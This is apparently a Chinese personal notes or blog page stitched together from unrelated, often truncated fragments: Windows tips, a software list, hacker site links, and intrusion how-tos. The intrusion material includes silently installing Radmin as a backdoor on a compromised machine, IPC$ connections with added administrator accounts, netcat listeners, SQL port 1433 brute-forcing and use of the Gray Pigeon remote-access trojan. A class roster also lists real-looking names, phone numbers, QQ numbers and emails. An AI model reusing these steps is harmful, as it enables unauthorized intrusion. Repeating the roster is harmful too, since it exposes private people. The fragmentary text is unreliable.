1、关闭注册表 Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistrytools"=dword:00000001 要解锁的话就进组策略gpedit.msc>管理模板>系统>阻止访问注册表编辑工具 2、在组策略里限制cmd.exe net.exe 等应用程序的运行. 3、secpol.msc>>帐户策略>>帐户锁定阀植设为3次. 4、关闭共享 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] "autodisconnect"=dword:0000

装好系统好先下补丁,再下常用的软件: 1 千千静听 2 卡巴斯基 3 矮人DOS工具箱 4 迅雷 5 MaxDos工具箱 6 realplay 7 冰刃1.2 8 冰点还原 9 费尔防火墙 10 winrar 11 media player11

姓名 QQ号码 E-mail 电话 地址 班级 刘澜 53049081 liulanand@163.com 13789328653 湖南工程学院北院东湖路18号 高二4班 易蕾 8513878 13970950068 南昌大学 高二4班 袁志刚 164931622 13813869461 南京 高二4班 方洁 191529902 07917118470（寝） 江西中医学院 高二4班 黄子惺 112468890 13979061644 湖南师范大学 高二4班 刘奇楠 26514010 liuqinan1985@sina.com 13810322117 北京 高二4班 任群英 107890617 江西师大 高二4班 庄福江 274702121 广州 高二4班 韦谦 57175230 liangming_wq@sohu.com 西安 高二4班

网络视频教程 http://www.so138.com/so/so138.aspx?id=296

监听TCP端口999 nc -l -p 999 监听UDP端口999 nc -l -u -p 999 保存在C盘 nc -l -p 999 > c:\\123.txt nc -v -l -p 999 一直监听999端口nc -v

Cisco频道 http://cisco.chinaitlab.com/index.html

写这个东西的目的在于让大家了解一下SC这个服务管理程序的使用，另一方面也是为了让大家更进一步的了解到NT，2000的服务的一些基础问题，如果有时间，希望大家好好看看。再来结合起上一次如何打开termservice服务的那篇文章，在服务方面大家应该比较了解了。用这个东西就可以删除在别人机器里留下的如ffsniffer, sksockerver这些东西，不用再担心，装上了删除不了。但是毕竟这个东西还是MS的产品，所以，如eventlog这样的服务，是不可以用它关闭的。

Radmin 服务端 r_server /install /silence //安装r_server r_server.exe /port:4899 /pass:hulonghua /save /silence //把端口定为4899,密码为hulonghua regedit.exe /s radmin.reg //把radmin.reg 导入肉鸡的注册表 net start r_server //启动服务.

在讲课的时候我估计有N多的人都没有听明白.原因首先是聊天室问题,其次就是我个人原因. 在动画中我会给大家做个详细的演示... 实例:http://www.tal

很多情况下，入侵者在使用工具注入时发现工具才解不出来表名和字段名，那是因为所有的工具都有自己的一部字典，这部字典内包括了表名和字段名，如果管理员把表名和字段名改成了不在这部字典内，那么我们使用的工具将无法猜解出字段名和表名。在以下的文章中，将从分析手工注入出发，来打造抵御SQL注入的防线。 　　入侵者将会构造简单的判断条件，来判断该页面是否存在注入漏洞，一般步骤如下: 　　这里要检测的页面为http://127.0.0.

著名的黑客站点 http://www.hack.co.za (国外著名黑客站点，较全的Exploit库) http://www.phrack.org (经典的黑客技术电子杂志) http://www.antionline.com (国外经典黑客站点) http://whitehats.com (白帽子网站，有最新的规则库下载，关于Snort等) http://lsd-pl.net (发布最新的Exploit程序) http://packetstormsecurity.com (国外著名漏洞库，有大量exploit程序) http://oliver.efri.hr/~crv/security/bugs/list.html (有整理好的最新漏洞库供下载) http://astalavista.box.sk (著名的软件破解网站) http

net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: net use h: \\ip\c$ 登陆后映射对方C：到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名　密码　/add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup administrators 用户名 /add

gpedit.msc-----组策略 sndrec32-------录音机 Nslookup-------IP地址侦测器 explorer-------打开资源管理器 logoff---------注销命令 tsshutdn-------60秒倒计时关机命令 lusrmgr.msc----本机用户和组 services.msc---本地服务设置 oobe/msoobe /a----检查XP是否激活 notepad--------打开记事本 cleanmgr-------垃圾整理 net start messenger----开始信使服务 compmgmt.msc---计算机管理 net stop messenger-----停止信使服务 conf-----------启动 netmeeting dvdplay--------DVD播放器 charmap--------启动字符映射表 diskmgmt.msc--

电子相册王(Photofamily) V3.0 简体中文版 http://www6.skycn.com/soft/2777.html

http://www.netyi.net/index.htm

打开CMD，在命令行下输入 net user guest password 这条命令是给guest设置密码，后面的password就是密码 然后输入 net user guest /active:y

前几天在某个网站(记不清了，不好意思 ^_*）上看到了一篇介绍如何建立隐藏的超级用户的图文教程，给我了很大的启发，作者只说明了如何在本地图形界面

需要软件。 recton2.5 灰鸽子2004版 radmin 虚拟系统。这些都可以在黑基或者黑鹰下到。 找软件我就不说了。黑基里搜索关键字2次就可以找到了。 目的：1。熟练的通过recton2.5入侵内网以知管理员密码的电脑。 2。熟练的学会增加管理员用户命令。 3。熟练的掌握鸽子以及radmin正向连接对方控制。 具体看动画。 十分简单。我是在虚拟电脑上入侵我本地计算机，为什么？因为我本地的电脑根本连接不上虚拟计算机，但是它却能连上我。晕吧？ 首

快捷键： Windows徽标键+L键 “换用户的窗口” Windows徽标键+E键启动“我的电脑” Windows徽标键+D键快速显示桌面 Windows徽标键+R键执行“运

1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破（字典是关键） 最后 SQLTools.exe入侵 对sql的sp2及以下的系统，

IPC是Internet Process Connection的缩写，也就是远程网络连接。它是Windows NT及Windows 2000特有的一项功能，特点是在同一时间内，两个IP之间只允许建立一个连接。好了，废话少说，现在进入主题。 如何找到具有IPC漏洞的主机呢？以前我都是组合一个国外的扫描工具（名字我忘了）和KillUSA的LetMeIn，因为很多工作都是手工完成的，所以速度可想而知了。现在因为有了小榕的流光2000，所以找到这样的主机实在是太简单了，具体操作我就不说了，大家可以参考

1：NET 只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！ 这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为127.0.0.1 net

pp号码:11827988